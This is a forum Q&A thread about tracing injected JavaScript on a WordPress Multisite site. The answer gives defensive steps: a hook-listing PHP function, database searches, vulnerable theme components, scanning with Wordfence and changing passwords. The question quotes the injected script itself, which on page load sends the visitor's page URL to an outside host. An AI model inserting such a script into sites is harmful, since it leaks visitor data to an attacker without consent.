如何确定插入的（可能是恶意的）JavaScript代码来自何处

Question

Suddenly I have noticed that all my pages contain some unexpected JavaScript code.

I don't check every day the source code. but today I need to debug something and then I see this code in all my pages.

I am using WordPress Multisite version 4.1.2.

All plugins on the site are from wordpress.org with the latest updated.

The question is how can I find out where code (from which file) is coming from? I have search in all the files using notepad++ and did not find this code in any file!

<script type="text/javascript" >
    var idPin = ""; 
    function postTest(idPin) {
        var xmlhttp; 
        if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } 
        else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } 
        var baseLocation = encodeURIComponent(document.URL);
        var req = "http://blockgroup.pw/testpost"; 
        d = "url=" + baseLocation + "&geo=" + idPin; xmlhttp.open("POST", req ,true);

        xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
        xmlhttp.send(d); 
    } 
    window.onload = function() { postTest(idPin); }
</script>

Answer 1

You try a couple things since Wordpress uses the Hooks to call respective parts. You could output them all and search for something related to this in the footer section.

A.

-- functions.php --

function list_hooked_functions($tag=false){
 global $wp_filter;
 if ($tag) {
  $hook[$tag]=$wp_filter[$tag];
  if (!is_array($hook[$tag])) {
  trigger_error("Nothing found for '$tag' hook", E_USER_WARNING);
  return;
  }
 }
 else {
  $hook=$wp_filter;
  ksort($hook);
 }
 echo '<pre>';
 foreach($hook as $tag => $priority){
  echo "<br />&gt;&gt;&gt;&gt;&gt;\t<strong>$tag</strong><br />";
  ksort($priority);
  foreach($priority as $priority => $function){
  echo $priority;
  foreach($function as $name => $properties) echo "\t$name<br />";
  }
 }
 echo '</pre>';
 return;
}

list_hooked_functions();

I assume since its JS that it will hook unto the wp_print_footer_scripts sequence. Which you can then go up the chain of calls and filter the specific function outputting the script.

https://developer.wordpress.org/reference/

To understand the structure of the functions involved.

B.

Another thing is that if the hacker managed to get access unto the Database maybe searching for the related script mention in the Database could be it. (though i doubt)

C.

See if you use any vulnerable code in your theme such as an incorperated gallery plugin inside the theme (which doesnt get updated) contrary to those installed via the Admin panel.

To be noted: often they will use a base64 string which they will then call the decode on in the process thus you wont be able to find the JS code as plain text.

RevSlider had a vulnerability not too long ago.

D.

Use a security plugin such as wordfence which can scan your files for suspicious code.

https://wordpress.org/plugins/wordfence

Once you find and removed the malicious code please make sure to change your passwords

--- Additional Information ---

There seems to be a lot going on in the wordpress realm and it pretty much affects a lot if you are using the Wordpress Comment Box.

Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. (27 April 2015)

Source : http://klikki.fi/adv/wordpress2.html

-- Please let us know if you get any lead with any of the above.